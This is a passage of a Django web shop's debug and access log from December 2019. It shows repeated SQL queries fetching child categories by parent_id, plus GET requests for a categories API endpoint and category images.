ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:37:24,296 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:37:24,300 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:37:24,306 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:37:24,310 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:37:24,314 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:37:24,319 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:37:24,323 utils 4252 140031747061504 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:37:24] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:37:25] "GET /media/categories/2019/12/07/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:37:25] "GET /media/categories/2019/12/13/collection10.png HTTP/1.0" 200 387799 [19/Dec/2019 12:37:25] "GET /media/categories/2019/12/07/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:37:28] "GET /media/categories/2019/12/13/collection6_4Q1Rpjs.png HTTP/1.0" 200 600645 [19/Dec/2019 12:37:28] "GET /media/categories/2019/12/13/collection6.png HTTP/1.0" 200 600645 [19/Dec/2019 12:37:30] "GET /media/categories/2019/12/13/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:31] "GET /media/categories/2019/12/13/collection6_YoOFERO.png HTTP/1.0" 200 600645 [19/Dec/2019 12:37:31] "GET /media/categories/2019/12/07/collection2.png HTTP/1.0" 200 466113 [19/Dec/2019 12:37:32] "GET /media/categories/2019/12/13/collection3_3c60jfJ.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:32] "GET /media/categories/2019/12/13/popular3.png HTTP/1.0" 200 309908 [19/Dec/2019 12:37:32] "GET /media/categories/2019/12/13/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:33] "GET /media/categories/2019/12/13/collection3_blWHbYx.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:36] "GET /media/categories/2019/12/07/collection3.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:36] "GET /media/categories/2019/12/13/collection3_lEyiVWB.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:37] "GET /media/categories/2019/12/13/collection3_pKohXg6.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:37] "GET /media/categories/2019/12/13/collection3_rYale9k.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:37] "GET /media/categories/2019/12/13/collection3_O3U2Kj1.png HTTP/1.0" 200 784410 [19/Dec/2019 12:37:40] "GET /media/categories/2019/12/07/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:41] "GET /media/categories/2019/12/13/collection7_sU2pbFG.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:43] "GET /media/categories/2019/12/13/collection7_s1gVgUK.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:45] "GET /media/categories/2019/12/13/collection7_zgKzb94.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:45] "GET /media/categories/2019/12/13/collection7_ZCM4YHI.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:46] "GET /media/categories/2019/12/13/collection7.png HTTP/1.0" 200 379075 [19/Dec/2019 12:37:48] "GET /media/categories/2019/12/07/collection4.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:48] "GET /media/categories/2019/12/13/collection4_45IbUzs.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:50] "GET /media/categories/2019/12/13/collection4_klUHkrJ.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:50] "GET /media/categories/2019/12/13/collection4_wmrC3xY.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:51] "GET /media/categories/2019/12/07/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:37:51] "GET /media/categories/2019/12/13/collection4_ykrPiOh.png HTTP/1.0" 200 432480 [19/Dec/2019 12:37:53] "GET /media/categories/2019/12/13/collection8_98NdtQd.png HTTP/1.0" 200 376652 [19/Dec/2019 12:37:54] "GET /media/categories/2019/12/13/collection8_MKX5n4Y.png HTTP/1.0" 200 376652 [19/Dec/2019 12:37:54] "GET /media/categories/2019/12/13/collection8_qT6o4Ze.png HTTP/1.0" 200 376652 [19/Dec/2019 12:37:55] "GET /media/categories/2019/12/13/collection8.png HTTP/1.0" 200 376652 [19/Dec/2019 12:37:57] "GET /media/categories/2019/12/07/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:37:57] "GET /media/categories/2019/12/13/collection5_NjJaGxE.png HTTP/1.0" 200 454674 [19/Dec/2019 12:37:57] "GET /media/categories/2019/12/13/collection5_DOY3fSw.png HTTP/1.0" 200 454674 [19/Dec/2019 12:38:00] "GET /media/categories/2019/12/13/collection5_J2Tl3z7.png HTTP/1.0" 200 454674 [19/Dec/2019 12:38:00] "GET /media/categories/2019/12/13/collection5_VsJvXmq.png HTTP/1.0" 200 454674 [19/Dec/2019 12:38:01] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:38:03] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 12:38:03] "GET /media/categories/2019/12/13/weapons2.png HTTP/1.0" 200 523712 [19/Dec/2019 12:38:04] "GET /media/categories/2019/12/13/weapons1.png HTTP/1.0" 200 700594 [19/Dec/2019 12:38:05] "GET /media/categories/2019/12/07/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:38:05] "GET /media/categories/2019/12/13/collection9.png HTTP/1.0" 200 284188 [19/Dec/2019 12:38:07] "GET /media/categories/2019/12/13/collection9_y5Aperx.png HTTP/1.0" 200 284188 DEBUG 2019-12-19 12:38:10,763 utils 4252 140031721535232 (0.006) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:38:10,778 utils 4252 140031721535232 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:38:10,789 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 12:38:10,794 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 12:38:10,801 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 12:38:10,805 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 12:38:10,810 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 12:38:10,818 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 12:38:10,822 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 12:38:10,829 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 12:38:10,833 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 12:38:10,840 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 12:38:10,848 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 12:38:10,855 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 12:38:10,866 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 12:38:10,872 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 12:38:10,879 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 12:38:10,883 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 12:38:10,887 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 12:38:10,893 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 12:38:10,895 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 12:38:10,897 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 12:38:10,900 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 12:38:10,902 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 12:38:10,905 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 12:38:10,909 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 12:38:10,911 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 12:38:10,914 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 12:38:10,916 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 12:38:10,918 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 12:38:10,922 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 12:38:10,925 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 12:38:10,927 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 12:38:10,930 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 12:38:10,932 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 12:38:10,938 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 12:38:10,941 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 12:38:10,944 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 12:38:10,947 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 12:38:10,950 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 12:38:10,952 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 12:38:10,955 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 12:38:10,958 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 12:38:10,961 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 12:38:10,965 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 12:38:10,967 utils 4252 140031721535232 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 12:38:10] "GET /api/v1/categories/ HTTP/1.0" 200 15396 [19/Dec/2019 12:38:11] "GET /media/categories/2019/12/13/collection5.png HTTP/1.0" 200 454674 [19/Dec/2019 12:38:11] "GET /media/categories/2019/12/07/collection1.png HTTP/1.0" 200 793553 [19/Dec/2019 12:38:49] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 12:38:51,573 utils 4252 140031721535232 (0.004) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 12:38:51,583 utils 4252 140031721535232 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 12:38:51,592 utils 4252 140031721535232 